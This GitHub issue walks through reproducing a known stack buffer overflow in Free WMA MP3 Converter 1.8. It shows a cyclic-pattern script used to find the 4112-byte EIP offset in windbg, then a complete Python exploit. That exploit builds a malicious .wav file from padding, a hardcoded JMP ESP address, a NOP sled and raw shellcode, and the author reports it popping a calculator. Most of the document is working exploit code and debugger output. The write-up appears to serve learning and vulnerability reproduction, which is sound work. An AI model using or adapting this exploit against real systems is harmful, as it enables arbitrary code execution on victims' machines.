FREE WMA MP3 CONVERTER 1.8 buffer overflow vulnerability reproduction #21

xinali opened this issue Mar 27, 2018 · 0 comments
xinali commented Mar 27, 2018

FREE WMA MP3 CONVERTER 1.8 buffer overflow vulnerability reproduction

Vulnerability overview

Vulnerability source: exploit-db

First, generate the test string

```python
#encoding:utf-8
# Python 2 script; needs pwntools (pwnlib) for the de Bruijn pattern helpers
import sys
from pwnlib.util.cyclic import cyclic, cyclic_find

def usage():
    print """
====================================================
        [*] python genseq.py s/g arg
        example:
        generate: python genseq.py g 1000
        search: python genseq.py s abcd
====================================================
        """

if __name__ == "__main__":
    if len(sys.argv) < 2:
        usage()
        sys.exit(1)

    op = sys.argv[1]
    try:
        if op == 'g':
            # generate: print the first <arg> bytes of the cyclic pattern
            gen_len = sys.argv[2]
            print cyclic(int(gen_len))
        elif op == 's':
            # search: print the offset of a 4-byte substring inside the pattern
            search_ch = sys.argv[2]
            print cyclic_find(search_ch)

    except Exception as ex:
        print ex
        usage()
```

Generate a 10000-byte wav file from the pattern, open the CONVERTER and attach windbg to it.

Start the conversion; the program crashes.

Locating the vulnerability

Use kb to view the call stack.

The whole call stack has been filled with our data. Use eip to locate the overflow length:

```
0:003> .formats(eip)
Evaluate expression:
  Hex:     61657062
  Decimal: 1634037858
  Octal:   14131270142
  Binary:  01100001 01100101 01110000 01100010
  Chars:   aepb
  Time:    Tue Oct 12 04:24:18 2021
  Float:   low 2.64525e+020 high 0
  Double:  8.07322e-315
```

Search for it with the program above (the value is little-endian, so the four bytes on the stack are "bpea"):

```
python genseq.py s bpea
4112
```

So once the string reaches 4112 bytes, eip is overwritten: the program performs no length check on the input, so a payload carrying shellcode can be constructed.
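The offset lookup above, as an added example that is not code from the issue: a Python 3 reimplementation of the de Bruijn pattern that pwntools' cyclic() and cyclic_find() are built on (lowercase alphabet and 4-byte subsequences are assumed to be the defaults the author used), plus a helper that maps the crash EIP printed by .formats straight to the offset, so the triage step can be checked without pwntools installed.

```python
import string
import struct
from itertools import islice

ALPHABET = string.ascii_lowercase  # pwntools' default cyclic alphabet (assumed)
N = 4                              # pwntools' default subsequence length (assumed)

def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the lexicographically smallest de Bruijn sequence B(k, n) one
    character at a time (the FKM algorithm; every n-gram occurs exactly once,
    which is what makes a crash value map back to a unique offset)."""
    k = len(alphabet)
    a = [0] * k * n
    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)
    yield from db(1, 1)

def cyclic(length):
    """The first `length` characters of the pattern, i.e. the test file's body."""
    return "".join(islice(de_bruijn(), length))

def cyclic_find(subseq, alphabet=ALPHABET, n=N):
    """Offset of an n-character substring within the pattern, or -1 if absent."""
    if len(subseq) != n:
        raise ValueError("subseq must be exactly %d characters" % n)
    window = ""
    for i, ch in enumerate(de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]
        if window == subseq:
            return i - n + 1
    return -1

def offset_from_eip(eip, n=N):
    """Map a crash EIP (what windbg's .formats shows as 'Chars: aepb') back to
    the bytes that sat on the stack (little-endian, so 'bpea') and their offset."""
    chars = struct.pack("<L", eip).decode("ascii")
    return chars, cyclic_find(chars, n=n)

if __name__ == "__main__":
    print(offset_from_eip(0x61657062))  # ('bpea', 4112), the value the issue found
```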

The payload layout is:

poc + eip + nops + shellcode

where poc is 4112 bytes long and eip is the address of the jmp esp that was found by searching the binary.

Test it with the shellcode given in the exploit-db entry:

```python
import struct
def little_endian(address):
  return struct.pack("<L",address)
poc="\x41" * 4112                 # padding up to the saved return address (offset 4112)
eip=little_endian(0x0045CD1A)     # 0045CD1A   FFE4  JMP ESP
nops="\x90" * 80                  # nop sled in front of the shellcode
shellcode=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
exploit = poc + eip + nops + shellcode
try:
    # binary mode so Windows does not translate line endings inside the payload
    rst= open("bof_WMA MP3 Converter.wav",'wb')
    rst.write(exploit)
    rst.close()
except:
    print "Error"
```

A calculator pops up.
